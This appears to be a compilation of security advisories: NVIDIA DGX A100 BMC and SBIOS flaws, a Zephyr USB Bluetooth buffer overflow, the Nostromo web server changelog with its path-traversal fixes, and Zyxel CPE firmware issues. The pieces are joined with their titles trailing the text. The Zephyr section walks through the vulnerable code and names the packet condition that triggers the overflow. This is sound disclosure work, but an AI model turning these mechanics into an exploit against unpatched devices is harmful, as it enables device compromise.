CVE‑2022‑42275

NVIDIA BMC contains a vulnerability in the IPMI handler, where an unauthenticated host is allowed to write to a host SPI flash, bypassing secure boot protections. An exploit of this vulnerability may lead to a loss of integrity or denial of service.

7.7

AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

CVE‑2022‑42276

NVIDIA DGX A100 server contains a vulnerability in SBIOS in the SmiFlash, where a local user with elevated privileges can read, write, and erase the flash, which may lead to code execution, escalation of privileges, denial of service, or information disclosure. The scope of the impact can extend to other components.

7.5

AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE‑2022‑42277

NVIDIA DGX Station contains a vulnerability in SBIOS in the SmiFlash, where a local user with elevated privileges can read, write, and erase the flash, which may lead to code execution, escalation of privileges, denial of service, or information disclosure. The scope of the impact can extend to other components.

7.5

AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H

CVE‑2022‑42278

NVIDIA BMC contains a vulnerability in the SPX REST API, where an attacker with the required privileges can read and write to arbitrary locations within the memory context of the IPMI server process, which may lead to code execution, denial of service, information disclosure, or data tampering.

7.2

AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑42279

NVIDIA BMC contains a vulnerability in the SPX REST API, where an attacker with the required privileges can inject arbitrary shell commands, which may lead to code execution, denial of service, information disclosure, or data tampering.

7.2

AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑42289

NVIDIA BMC contains a vulnerability in the SPX REST API, where an attacker with the required privileges can inject arbitrary shell commands, which may lead to code execution, denial of service, information disclosure, or data tampering.

7.2

AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑42290

NVIDIA BMC contains a vulnerability in the SPX REST API, where an attacker with the required privileges can inject arbitrary shell commands, which may lead to code execution, denial of service, information disclosure, or data tampering.

7.2

AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑42280

NVIDIA BMC contains a vulnerability in the SPX REST authorization handler, where an unauthorized attacker can exploit a path traversal, which may lead to escalation of privileges.

7.1

AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

CVE‑2022‑42281

NVIDIA DGX A100 contains a vulnerability in SBIOS in the FsRecovery, which may allow a highly privileged local attacker to cause an out-of-bounds write, which may lead to code execution, denial of service, loss of data integrity, or information disclosure.

6.7

AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑42282

NVIDIA BMC contains a vulnerability in the SPX REST API, where an attacker with the required privileges can access arbitrary files, which may lead to information disclosure.

6.5

AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVE‑2022‑42283

NVIDIA BMC contains a vulnerability in the IPMI handler, where an attacker with the required privileges can cause a buffer overflow, which may lead to denial of service or code execution.

6.4

AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H

CVE‑2022‑42284

NVIDIA BMC stores user passwords in an obfuscated form in a database accessible by the host, which may lead to exposure of user credentials.

6.2

AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE‑2022‑42285

DGX A100 SBIOS contains a vulnerability in the Pre-EFI Initialization (PEI) phase, where a privileged user can disable SPI flash protection, which may lead to denial of service, escalation of privileges, or data tampering.

6.0

AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

CVE‑2022‑42286

DGX A100 SBIOS contains a vulnerability in Bds, which may lead to code execution, denial of service, or escalation of privileges.

6.0

AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

CVE‑2022‑42287

NVIDIA BMC contains a vulnerability in the IPMI handler, where an attacker can upload and download arbitrary files under certain circumstances, which may lead to denial of service, escalation of privileges, information disclosure, or data tampering.

6.0

AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N

CVE‑2022‑42288

NVIDIA BMC contains a vulnerability in the IPMI handler, where an unauthorized attacker can use certain oracles to guess a valid BMC username, which may lead to information disclosure.

5.3

AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

The NVIDIA risk assessment is based on an average of risk across a diverse set of installed systems and may not represent the true risk to your local installation. NVIDIA recommends consulting a security or IT professional to evaluate the risk to your specific configuration.

**Security Updates**

The following table lists the NVIDIA systems affected, firmware versions affected, and the updated version that includes this security update. To protect your system, download and install this firmware update through the NVIDIA Enterprise Support Portal.

**CVE IDs Addressed**

**Hardware Platform**

**System**

**Affected Versions**

**Updated Version**

CVE‑2022‑42276  
CVE‑2022‑42281  
CVE‑2022‑42285  
CVE‑2022‑42286

NVIDIA DGX servers

DGX A100

All SBIOS firmware versions prior to 1.18

SBIOS Firmware 1.18

CVE‑2022‑42271  
CVE‑2022‑42272  
CVE‑2022‑42273  
CVE‑2022‑42274  
CVE‑2022‑42275  
CVE‑2022‑42278  
CVE‑2022‑42279  
CVE‑2022‑42280  
CVE‑2022‑42282  
CVE‑2022‑42283  
CVE‑2022‑42284  
CVE‑2022‑42287  
CVE‑2022‑42288  
CVE‑2022‑42289  
CVE‑2022‑42290

NVIDIA DGX servers

DGX A100

All BMC firmware versions prior to 00.19.07

BMC Firmware 00.19.07

CVE‑2022‑42277

NVIDIA DGX servers

DGX Station A100

All SBIOS firmware versions prior to 10.16

SBIOS Firmware 10.16

**Notes:**

*   To get the updated firmware and SBIOS version listed in the table above, upgrade to the NVIDIA DGX A100 firmware container 22.12.1, or NVIDIA DGX Station A100 firmware container 22.2.1. Firmware updates are available through the NVIDIA Enterprise Support Portal.
    
*   See Security Updates for the version to install.
    
*   NVIDIA recommends that all BMC ports be restricted to a dedicated management network with firewall protection. If remote access to the BMC is required, such as for a system hosted at a co-location provider, the BMC should be accessed through a secure method that provides isolation from the Internet, such as through a VPN server.
    

**Acknowledgements**

All the vulnerabilities addressed in this bulletin were discovered by the NVIDIA Offensive Security Research (OSR) team.

**Additional Information**

AMI has reported potential security vulnerabilities in some AMI MegaRAC SP-X Baseboard Management Controllers that may allow user enumeration, unauthorized access, or arbitrary code execution. The NVIDIA DGX A100 BMC is affected by the following AMI vulnerabilities and plans to release an update to address them in May 2023.

*   CVE‑2022‑40259: AMI MegaRAC Redfish Arbitrary Code Execution
*   CVE‑2022‑40242: MegaRAC Default Credentials Vulnerability
*   CVE‑2022‑2827: AMI MegaRAC User Enumeration Vulnerability

The NVIDIA DGX-1, DGX-2, DGX Station A100 and DGX Station systems are not vulnerable to these CVEs.

**Get the Most Up to Date Product Security Information**

Visit the NVIDIA Product Security page to

*   Subscribe to security bulletin notifications
*   See the current list of NVIDIA security bulletins
*   Report a potential security issue in any NVIDIA supported product
*   Learn more about the vulnerability management process followed by the NVIDIA Product Security Incident Response Team (PSIRT)

**Revision History**

  

**Revision**

**Date**

**Description**

2.0

January 10, 2023

Added CVE IDs omitted from the Security Updates table

1.0

December 19, 2022

Initial release

**Support**

If you have any questions about this security bulletin, contact NVIDIA Support.

**Disclaimer**

ALL NVIDIA INFORMATION, DESIGN SPECIFICATIONS, REFERENCE BOARDS, FILES, DRAWINGS, DIAGNOSTICS, LISTS, AND OTHER DOCUMENTS (TOGETHER AND SEPARATELY, “MATERIALS”) ARE BEING PROVIDED “AS IS.” NVIDIA MAKES NO WARRANTIES, EXPRESS, IMPLIED, STATUTORY, OR OTHERWISE WITH RESPECT TO THE MATERIALS, AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OR CONDITION OF TITLE, MERCHANTABILITY, SATISFACTORY QUALITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT, ARE HEREBY EXCLUDED TO THE MAXIMUM EXTENT PERMITTED BY LAW.

Information is believed to be accurate and reliable at the time it is furnished. However, NVIDIA Corporation assumes no responsibility for the consequences of use of such information or for any infringement of patents or other rights of third parties that may result from its use. No license is granted by implication or otherwise under any patent or patent rights of NVIDIA Corporation. Specifications mentioned in this publication are subject to change without notice. This publication supersedes and replaces all information previously supplied. NVIDIA Corporation products are not authorized for use as critical components in life support devices or systems without express written approval of NVIDIA Corporation.

CVE-2022-42271: NVIDIA DGX A100 Server and DGX Station A100 - December 2022

usb device bluetooth class includes a buffer overflow related to implementation of net_buf_add_mem.

**Impact**

Unfortunately it looks like that the usb device bluetooth class includes a buffer overflow related to implementation of net\_buf\_add\_mem. An attacker may interactively write arbitrary amounts of data utilizing the usb hci out endpoint which will be copied to the destination bypassing buffer boundaries resulting in an overflow. Depending on actual implementation this may result in denial of service, security feature bypass or in worst case scenario execution of arbitrary code.

When a Zephyr-powered usb bluetooth device changes status to either configured or resumed the acl\_read\_cb function will be called as implemented in bluetooth\_status\_cb (subsys/usb/class/bluetooth.c).

    static void bluetooth_status_cb(struct usb_cfg_data *cfg,
    enum usb_dc_status_code status,
    const uint8_t *param)
    {
    ARG_UNUSED(cfg);
    
    /* Check the USB status and do needed action if required */
    switch (status) { 
    ... 
     case USB_DC_CONFIGURED:
    LOG_DBG("Device configured");
    if (!configured) {
    configured = true;
    /* Start reading */
    acl_read_cb(bluetooth_ep_data[HCI_OUT_EP_IDX].ep_addr,
       0, NULL);
    }
    break 
     ...
     case USB_DC_RESUME:
    LOG_DBG("Device resumed");
    if (suspended) {
    LOG_DBG("from suspend");
    suspended = false;
    if (configured) {
    /* Start reading */
    acl_read_cb(bluetooth_ep_data[HCI_OUT_EP_IDX].ep_addr,
       0, NULL);
    }
    } else {
    LOG_DBG("Spurious resume event");
    }
    break; 
    

Since initially provided size equals to zero in during execution of acl\_read\_cb up to USB\_MAX\_FS\_BULK\_MPS bytes will be read from the HCI OUT endpoint.

    static void acl_read_cb(uint8_t ep, int size, void *priv)
    {
    static struct net_buf *buf;
    static uint16_t pkt_len;
    uint8_t *data = ep_out_buf;
    if (size == 0) {
    goto restart_out_transfer;
    }
    ...
    restart_out_transfer:
    usb_transfer(bluetooth_ep_data[HCI_OUT_EP_IDX].ep_addr, ep_out_buf,
        sizeof(ep_out_buf), USB_TRANS_READ | USB_TRANS_NO_ZLP,
        acl_read_cb, NULL);
    }
    

During next callback of acl\_read\_cb size is up to USB\_MAX\_FS\_BULK\_MPS bytes, buf is null so a buffer buf will be allocated in either BT\_BUF\_H4 or BT\_BUF\_ACL\_OUT pool (depending on used mode) by bt\_buf\_get\_tx. Next pkt\_len is determined by analysing the read data by hci\_pkt\_get\_len.

     if (buf == NULL) {
    /*
    * Obtain the first chunk and determine the length
    * of the HCI packet.
    */
    if (IS_ENABLED(CONFIG_USB_DEVICE_BLUETOOTH_VS_H4) &&
       bt_hci_raw_get_mode() == BT_HCI_RAW_MODE_H4) {
    buf = bt_buf_get_tx(BT_BUF_H4, K_FOREVER, data, size);
    pkt_len = hci_pkt_get_len(buf, &data[1], size - 1);
    LOG_DBG("pkt_len %u, chunk %u", pkt_len, size);
    } else {
    buf = bt_buf_get_tx(BT_BUF_ACL_OUT, K_FOREVER, data, size);
    pkt_len = hci_pkt_get_len(buf, data, size);
    LOG_DBG("pkt_len %u, chunk %u", pkt_len, size);
    }
    

The provided payload needs to be crafted in such a manner that pkt\_len != 0 && pkt\_len != buf->len. This way the buffer will not be unreferenced or put in the rx\_queue. Another read of USB\_MAX\_FS\_BULK\_MPS from the host will be executed followed by acl\_read\_cb callback.

Since buf is not null this time a branch involving net\_buf\_add\_mem will be executed.

     if (buf == NULL) {
    /*
    * Obtain the first chunk and determine the length
    * of the HCI packet.
    */
    ...
    }
    if (pkt_len == 0) {
    LOG_ERR("Failed to get packet length");
    net_buf_unref(buf);
    buf = NULL;
    }
    } else {
    /*
    * Take over the next chunk if HCI packet is
    * larger than USB_MAX_FS_BULK_MPS.
    */
    net_buf_add_mem(buf, data, size);
    LOG_DBG("len %u, chunk %u", buf->len, size);
    }
    
    net_buf_add_mem relies on net_buf_simple_add_mem.
    
    static inline void *net_buf_add_mem(struct net_buf *buf, const void *mem, size_t len)
    {
            return net_buf_simple_add_mem(&buf->b, mem, len);
    }
    

net\_buf\_simple\_add\_mem copies len bytes of data from mem to the address returned by net\_buf\_simple add. In this case mem points to ep\_out\_buf containing data read over usb, len equals to the number of bytes read.

    void *net_buf_simple_add_mem(struct net_buf_simple *buf, const void *mem, size_t len)
    {
            NET_BUF_SIMPLE_DBG("buf %p len %zu", buf, len);
            return memcpy(net_buf_simple_add(buf, len), mem, len);
    }
    

net\_buf\_simple\_add does not assure that enough room is available in the buffer, it only increments buf->len by provided len and returns the original buffer tail.

    void *net_buf_simple_add(struct net_buf_simple *buf, size_t len)
    {
            uint8_t *tail = net_buf_simple_tail(buf);
            NET_BUF_SIMPLE_DBG("buf %p len %zu", buf, len);
            __ASSERT_NO_MSG(net_buf_simple_tailroom(buf) >= len);
            buf->len += len;
            return tail;
    }
    

After execution flow returns to acl\_read\_cb the buffer won't be put into rx\_queue as pkt\_len != buf->len and another usb read will be performed. The cycle of calls of usb reads followed by net\_buf\_add\_mem calls can be executed for an arbitrary number of times (until zero bytes are read) allowing a large buffer overflow.

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in zephyr
*   Email us at Zephyr-vulnerabilities

embargo: 2022-02-12

CVE-2021-3966: Usb bluetooth device ACL read cb buffer overflow

nhttpd in Nostromo before 2.1 is vulnerable to a path traversal that may allow an attacker to execute arbitrary commands on the remote server. The vulnerability occurs when the homedirs option is used.

$nostromo: ChangeLog,v 1.241 2022/12/15 19:18:41 hacki Exp $ 2.1 === - Fix a vulnerability reported by Riccardo Krauter @ SoterITSecurity: If nostromo runs non-chrooted, and with the 'homedirs' configuration option enabled (disabled by default), an attacker can exploit a vulnerability to access files or execute programs (as CGI) outside of the server root directory. For that a specific request URL needs to be crafted by the attacker. 2.0 === - Fix compiling on NetBSD by suppressing the -Wall compiler option. Otherwise compiling breaks due to snprintf() truncate warnings. - Fix sizeof(http\_url) to sizeof(http\_urls) for the http\_urls buffer. Had no impact since both buffers anyway have the same size. - Replace SSL\_CTX\_use\_certificate\_file() with SSL\_CTX\_use\_certificate\_chain\_file(), so that the full certificate chain can be verified. - Update to libmy-2.1, which makes libbsd obsolete, and fixes compiling on FreeBSD. 1.9.9 ===== - Stupid me, forgot to bump the version in the last release! 1.9.8 ===== - Fix a potential segfault which can happen during nhttpd startup when reading a malformed comment line in the nhttpd.conf file. This was was caused by a buffer overflow in the libmy-1.8 fparse() function. Therefore upgraded to libmy-1.9 which contains a fix for fparse(). The issue was reported by Christoffer Jerkeby. 1.9.7 ===== - Fix for CVE-2019-16278 discovered by sp0re. Issue: Due to the missing accounting of the '\\r' character in the libmy-1.7 strcutl() function, an attacker can bypass the directory traversal check in the http\_verify() function in a non-chrooted nhttpd server and thus remote execute unauthorized code. Solution: Fix the strcutl() function in libmy-1.8 as described in the libmy ChangeLog: - strcutl(): take account of the '\\r' character when it appears within a string instead of ignoring it. Improved logic and performance diff by Adrian Steinmann Therefore the injected '\\r' characters will now generate an invalid path resulting in a HTTP 404 response. - Fix for CVE-2019-16279 discovered by sp0re. Issue: The missing header count functionality in the http\_header\_comp() function allowed an attacker to transmit more headers than accepted by nhttpd resulting in a buffer overflow in the header array leading to DoS. Solution: Add the missing header count functionality to the http\_header\_comp() function. Transmission of too many headers will now result in a HTTP 413 response as initially intended. - Close the connection after an HTTP 413 response as we are allowed according to RFC 2626 HTTP/1.1 10.4.14. 1.9.6 ===== - Restore original errno value after handling SIGCHLD. Otherwise this could lead to a break out of the main select(2) loop and therefore of unexpected termination of nostromo. Spotted by Adam Wozniak, nice catch! - Change the crypt(3) API, which is used for basic authentication, to accept all supported algorithms not just DES. - Check crypt(3) for returning NULL to prevent the nhttpd process to core dump in this case. - Add server cache for basic authentication credentials to speed up performance. This will save us filesystem access to htpasswd and additional password encryption cpu cycles for crypt(3). - Add MD5, Blowfish-a, and Blowfish-b algorithm to the crypt(1) tool. - Replace rand(3) with arc4random(3) in the crypt(1) tool for OpenBSD, NetBSD, and FreeBSD. - Fix broken BSD authentication method for basic authentication. - Fix several bites to make nostromo compile cleanly on the tested platforms again which are OpenBSD, NetBSD, FreeBSD, and Linux. - Rewrote printenv CGI from perl to shell script. - Add support for SIGHUP configuration reload. - Make a child process use the default signals instead inheriting the parent process signal handler. This fixes some odd issues. - Update copyright year to 2004 - 2016 and add nostromo CVS Id to all files. 1.9.5 ===== - Handle "Location:" field correctly when passed by a CGI. Bug reported by Axel Gonzalez. 1.9.4 ===== - Update copyright year to 2004 - 2011. - Make nostromo compile again by default; Remove -Werror in src/nhttpd makefiles and #include to src/nhttpd/main.c. - Fix a bug where when nostromo doesn't run in chroot mode somebody can access files beyond our htdocs environment by using specific encoded characters in the request URI (security issue). Issue found and reported by RedTeam Pentesting GmbH. - Fix a bug where in certain conditions garbage is written into the access\_log user agent field. - Do proper handling of max. file descriptors and allow to bump the select(2) max. file descriptors limit (FD\_SETSIZE) via the CON define in config.h by dynamically allocating the fd\_sets. 1.9.3 ===== - Fix two err(3) calls which are lacking an \`%s' modifier (security issue). Patch from Simon Kuhnle. - Fix wrong select() / send\_file() looping (resulting in high process load occasionally), by fixing bogus EAGAIN error handling in sys\_write\_a(). - Fix missing \`\`.Ed'' in nhttpd.8 man page. 1.9.2 ===== - Fix a bug where a 403 response is returned instead of a 404 response. Patch from Szabolcs Nagy. - Style diff which fixes spacing from Daniel Ouellet. - Add optional \`\`homedirs\_public'' configuration parameter to restrict access within the home directories. Suggested by Simon Kuhnle. - Add mandatory \`\`serverlisten'' configuration parameter to allow specific interface binding. - Replaced libmy with latest version libmy-1.7. 1.9.1 ===== - Replace off\_t with intmax\_t integer type since problems have been reported with compiling on some 64bit Linux systems. Therefore we remove the GNU compiler option '-D\_FILE\_OFFSET\_BITS=64'. Initial diff received from Kurt Roeckx. - For unused, string based configuration options, use '\\0' instead strlcpy() '0' into the array. It's less disturbing and more straight. Diff received from Szabolcs Nagy. - Don't leave some alias specific buffers uninitialized, because it can happen that we access those later. Bug reported by Szabolcs Nagy. - According to RFC 3875 set the SERVER\_NAME environment variable dynamicly dependend on the "Host:" request header field instead setting it staticly to the configured servername. Bug reported by Szabolcs Nagy. - Fix a bug where a CGI "Status:" request for 403 or 404 caused a corrupt response header. Bug reported by Szabolcs Nagy. - The header field "Host:" is mandatory for HTTP/1.1 client requests. If it doesn't exist return 400 Bad Request instead of further processing the request. Bug reported by Szabolcs Nagy. - Drop MacOSX support. Too many tweaks with recent MacOSX versions for compiling. - Update copyright year to 2004 - 2009. - Fix sys\_log() by replacing syslog() with vsyslog() so the string arguments get passed. While here move from LOG\_DEBUG to LOG\_INFO. - Replaced libmy with latest version libmy-1.6. 1.9 === - Replace server log parameter entries in the man page by syslog(3). 1.8.9 ===== - send all server log messages to syslog(3) instead to our own log file The configuration parameter "logserver" is obsolete therefore and has been removed from nhttpd.conf. Suggested by Matthias-Christian Ott - Make "logpid" and "logaccess" configuration parameters optional, which allows it to disable pid and access log creation. Suggested by Matthias-Christian Ott. - Remove the whole BSD authentication code on non-OpenBSD systems. Diff received from Matthias-Christian Ott. 1.8.8 ===== - Fix a bug where a requested file with size 0 caused us to send an HTTP repsonse in a loop. Bug reported by Kai Hendry. - Fix a bug where a directory request without trailing "/" to a virtual host URL returned a wrong 301-Location field value. Bug reported by Kai Hendry. - Change mime types parsing to the default syntax; extensions are separated by spaces instead by commas. Our default mime types file (conf/mimes) has been changed to the new syntax therefore. - Also check if HTTPS requests do match to our default URL before searching for virtual hosts. 1.8.7 ===== - Fix security issue for none chroot environments reported by Ben Hutchings: Disallow any direct access to upper level directories (..). On occurrence of a "/../" string in the request URI we return 400 Bad Request now. This prevents access to files beyond of the serverroot directory. - Fix a bug reported by Szabolcs Nagy: If a CGI option ends with a "/" don't apply the docindex to it. - If the PID file can't be created also report about the full filename in the error log. Requested by Kai Hendry. 1.8.6 ===== - Handle POST requests with content length 0 correctly, diff received from Georg Wendenburg. 1.8.5 ===== - Added support for SSLv3. - Replaced a strlcpy() with memcpy() because at this point binary data could be involved. Pointed out by Georg Wendenburg. - Added CONTENT\_TYPE CGI env, diff received from Georg Wendenburg. - Quiet down error messages in the server log file by moving some common error messages to the debug mode output. 1.8.4 ===== - If a select(2) error in the main loop is not EINTR, we shutdown the server. EFAULT, EBADF, and EINVAL are not acceptable. - When a connection gets closed FD\_CLR() the write set also in either case. this fix should finally let get us rid from the select(2) EBADF error, and overwrites the EBADF workaround fix from version 1.8.3. 1.8.3 ===== - Fix a Linux tweak with off\_t by adding -D\_FILE\_OFFSET\_BITS=64 to the compiler options. - If a select(2) error in the main loop is not EINTR, close the connection. this avoids endless looping e.g. when EBADF occurs. - Typo corrections for nhttpd.conf-dist and nhttpd.8 from Will Maier. 1.8.2 ===== - Fix wrong version numbers. 1.8.1 ===== - Fixed gcc3 tweak with variable array definition which caused compiliation error on gcc2 platforms. - Replaced libmy with latest version libmy-1.5. 1.8 === - Added homedirs support. - Added basic authentication via BSD authentication. - Moved variable type for filesizes from int to off\_t to enable proper transfers of very large files. - Directory listing files are sorted alphabetical now. - Make our HTML output HTML 4.01 transitional. - Fixed man page typos. 1.7.9 ===== - The rewritten http\_header\_comp() function implemented in version 1.7.7 could lead to a buffer overflow in some circumstances because the arrived header sequence was not checked for its minimum size. On my machines this effect ended up in a immediately process termination. Nasty bug fixed now. While we are at this function we also get rid of strlen() because we already have the current header size saved in our connection structure; safer and faster. - Fixed man page typos. 1.7.8 ===== - CGIs are no longer determined by a CGI alias. nhttpd checks now if a file has the world executable flag set, and if yes the file is handled as a CGI. this allows you to place CGIs anywhere in your document root, and also to use CGIs as index. the cgiroot and cgiindex config options are obsolete therefore and where removed from the configfile. cgi-bin has moved to htdocs/cgi-bin - Use stat(2) S\_IROTH instead of access(2) to check for file permissions, as we have that information already. - Added HTTP\_ACCEPT\_ENCODING CGI env - Simplified debug logging. - Fixed broken permissions checking on directories. - Fixed another binary data handling issue in CGI main loop. - Improved error handling for select(2) in CGI main loop. - On a fatal error at CGI execution send a 500 before exit(3). - Extended man page. 1.7.7 ===== - http\_header\_comp() which checks if a complete header sequence arrived got unreliable because of our new asynchronous connection handling since version 1.7.6. The function is fixed now and as a side effect much more simplified using less resources. 1.7.6 ===== - Rewrote nostromo to handle connections fully asynchronous over one single select(2) now. This change also fixes the problem that slow connections walked into a connection timeout. - The socket send buffer size is now kept to the operating system value by default. It can be changed optional in config.h by the SBS define. - Added debug mode option. - Added IF\_MODIFIED\_SINCE CGI env, diff received from Daniel Hartmeier. - Fixed unterminated childs leftover when parent is killed. - Fixed broken pipeline connection handling. - Fixed http\_chunk() to handle also binary data now. - Fixed double printing of server port in the signature. - Fixed double creation of Location header field for CGIs. - Fixed wrong Location string for 301 responses over SSL non-default port. - Fixed access log variable which could be used uninitialized. - Fixed broken custom responses. on large custom response files, the transfer was aborted. - Disabled chunking for HTTP/1.0 clients. - Disabled case sensitivy for HTTP protocol. - Reorderd configuration file. - Removed a unnecessary getpid(2) when daemonizing. - Replaced signal handlers SIGTERM code with a volatile sig\_atomic\_t flag. - Extended man page. - Improved style / KNF. 1.7.5 ===== - Set SO\_SNDBUF size on accepted client socket, not on the listener socket, because not every tcp/ip implementation supports inheritance. - Set sockets to O\_NONBLOCK to prevent any possible blocks. 1.7.4 ===== - Fixed POST content size limitation of 8KB. POST content can now be unlimited and is handled in the forked CGI process itself. - Removed all setenv(3) and unsetenv(3) functions and set CGI environment vars with execve(2) instead. This has increased the CGI serving performance about the factor 8. - The DOCUMENT\_ROOT CGI environment variable was set wrong in some cases. Bug fixed now. - In some cases the GMT offset was wrong calculated in the access log. Bug fixed now 1.7.3 ===== - Optimized performance and memory usage by source code optimization. - If a CGI post body included binary data the processing was aborted because we could not handle the binary part. Bug fixed now. - If a CGI post body was terminated with '\\r\\n' and some browsers count that to its content length (and some do not, what a mess!) the post was ignored. Bug fixed now - If the defined setuid user was not found, output a custom error instead the getpwnam(3) errno which almost says nothing. - Removed -ansi compile option to follow OpenBSD. - Fixed -pedantic compile option source code quirks. - Replaced libmy with latest version libmy-1.4. - Changed logo URL. - Applied typo diff for man page received from Marc Balmer@. 1.7.2 ===== - Added custom 401, 403, and 404 responses, requested by Marc Winiger. - Added nph CGI support. - Close all file descriptors which do not belong to the child after fork(2). - Replaced recv(2) with read(2) as we do not use flags. - Replaced send(2) with write(2) as we do not use flags. - Check more system calls for EINTR. - If a CGI post body was terminated with '\\r\\n', we did not parsed that and the post was ignored. Bug fixed now. - In some cases we had wrong data transmission because write(2) was not checked for short writes. Bug fixed now. - Fixed SSL memory leak. 1.7.1 ===== - Implemented HEAD method. - If on basic authentication the realm option in a htaccess file could not be parsed, we just kept the last value in the realm variable instead of overwriting it with "unknown realm". Bug fixed now. 1.7 === - Added 206 Partial Content. Forced by Delta. - Added example lines to configuration file how to change default port 80. - Excluded sin6\_len for Linux. - Imported new nostromo logo. - It is possible now to run IPv6 only. - Deny to run nhttpd as root. - Improved SSL handshake. - Main select(2) checks now writefds to cleanly serve partial file sends - Fixed typos and reviewed source code for BSD style. - If 301 Moved Permanently was called with https, we switched back to http because we did not check for the https flag. Bug fixed now. 1.6 === - Added IPv6 support. - Added pid file creation. - Set listener sockets to SO\_REUSEADDR. - Moved a bunch of static environment variables to dynamic ones, because of SSL and IPv6 introduction. - CGI https environment variable was set wrong because asking the wrong ssl flag variable. Bug fixed now. - If running in chroot mode, virtual hosts and aliases where not found because we accessed the full path to the config file. Bug fixed now. - If returning 500 on file send errors, open files where not closed. Bug fixed now. 1.5.1 ===== - chroot mode caused process hang if /dev/null where not found in the chroot environment. Bug fixed now. 1.5 === - Added SSL support. - Added 403 Forbidden, what means that files are checked for read permissions now instead returning 500 Internal Server Error if no access. - Added TODO file. - Corrected and extended man page. - If the content type was unknown the previous content type was sent, which is wrong. Now the html content type will be send per default on unknown content types. - select(2) for header and body read where using the same readset as the master select(2) which is wrong. Using now own readset. 1.4 === - Corrected the man page. - One of three access\_log functions was still logging with two lines per hit. Bug fixed now. 1.3 === - Makefiles have been ported to compile also on NetBSD, FreeBSD, Linux and MacOSX. - Reduced access\_log to one line per hit instead of two. - Filenames including spaces in directory listing wasn't found, because the href entry had no quotes. Bug fixed now. 1.2 === - If a CGI was called which didn't exist, the last called CGI was executed because the responsible variable, which holds the full executable path, wasn't overwritten. bug fixed now. - Replaced libmy with latest version libmy-1.3 (fixes important security issues). - Replaced last strcpy(3) with strlcpy(3). 1.1 === - Increased socket send buffer to avoid send(2) blocking when buffer is full. - In server log removed unnecessary log messages, made the existing ones more specific and added new log messages. - Removed pre-compiler debug informations because they made the source code hard to read and where not really usable in action. 1.0 === - Fixed memory leak. 0.9 === - A wrong if-condition caused the nhttpd parent process to exit(0) if a CGI was called which didn't exist. Bug fixed now. 0.8 === - Nostromo has been rewritten from a fork(2) server to a select(2) server. with this new method no more child forking for file requests is necessary and the server performance increases therefore. - Increased performance by optimizing source code. - Replaced libmy with latest version libmy-1.2 (faster). - Added pre-compiler debug option to config.h. 0.7 === - Sometimes a child process still hung because not all recv(2) was checked for connection timeout. placed select(2) in front of all recv(2) to check timeout. - Fixed wrong version numbering at several places. - Added install script (Install). 0.6 === - Sometimes a child process hung because of blocking recv(2). bug fixed now. - Replaced libmy with latest version libmy-1.1. - Added timestamps to server log file. - Added version option. 0.5 === - nhttpd didn't chroot(2) because chroot(2) where placed before all configuration files could be read. bug fixed now. 0.4 === - libmy had missing #include in flog.c, nsend.c, strlower.c some architectures (e.g. sparc64) complained and stopped at compiling. bug fixed now. 0.3 === - nhttpd didn't handle http control characters (\\r\\n\\r\\n) in POSTs body entity, and blocked at recv(2). bug fixed now. 0.2 === - Changed default configfile path to /var/nostromo/conf/nhttpd.conf. - chdir/chroot will directly done after reading the configfile successfully. - SIGPIPE, SIGHUP, SIGQUIT, SIGALRM will be silently ignored now and don't generate a server log anymore. 0.1 === - Initial version.

CVE-2022-48253

A buffer overflow vulnerability in the parameter of web server in Zyxel Nebula NR7101 firmware prior to V1.15(ACCC.3)C0, which could allow an authenticated attacker to cause denial-of-service (DoS) conditions by sending a crafted authorization request.

**CVE: CVE-2022-43389, CVE-2022-43390, CVE-2022-43391, CVE-2022-43392****Summary**

Zyxel is aware of multiple vulnerabilities reported by Positive Technologies and advises users to install the applicable firmware updates for optimal protection.

**What are the vulnerabilities?**

CVE-2022-43389

A buffer overflow vulnerability in the library of the web server in some 5G NR/4G LTE CPE devices, which could allow a remote unauthenticated attacker to execute some OS commands or to cause denial-of-service (DoS) conditions on a vulnerable device. Note that the WAN access is disabled by default on most devices.

CVE-2022-43390

A command injection vulnerability in the CGI program of some 5G NR/4G LTE CPE, DSL/Ethernet CPE, fiber ONT, and WiFi extender devices, which could allow a remote authenticated attacker to execute some OS commands on a vulnerable device by sending a crafted HTTP request. Note that the WAN access is disabled by default on most devices.

CVE-2022-43391

A buffer overflow vulnerability in the parameter of the CGI program in some 5G NR/4G LTE CPE, DSL/Ethernet CPE, fiber ONT, and WiFi extender devices, which could allow a remote authenticated attacker to cause DoS conditions by sending a crafted HTTP request. Note that the WAN access is disabled by default on most devices.

CVE-2022-43392

A buffer overflow vulnerability in the parameter of web server in some 5G NR/4G LTE CPE, DSL/Ethernet CPE, fiber ONT, and WiFi extender devices, which could allow a remote authenticated attacker to cause DoS conditions by sending a crafted authorization request. Note that the WAN access is disabled by default on most devices.

**What versions are vulnerable—and what should you do?**

After a thorough investigation, we have identified the vulnerable products that are within their vulnerability support period and released updates to address the vulnerabilities, as shown in the following tables.

Product

Affected model

Patch availability\*

5G NR/4G LTE CPE

LTE3202-M437

V1.00(ABWF.1)C0

LTE3316-M604

V2.00(ABMP.6)C0

LTE7480-M804

V1.00(ABRA.6)C0

LTE7490-M904

V1.00(ABQY.5)C0

Nebula FWA510

V1.15(ACGD.3)C0

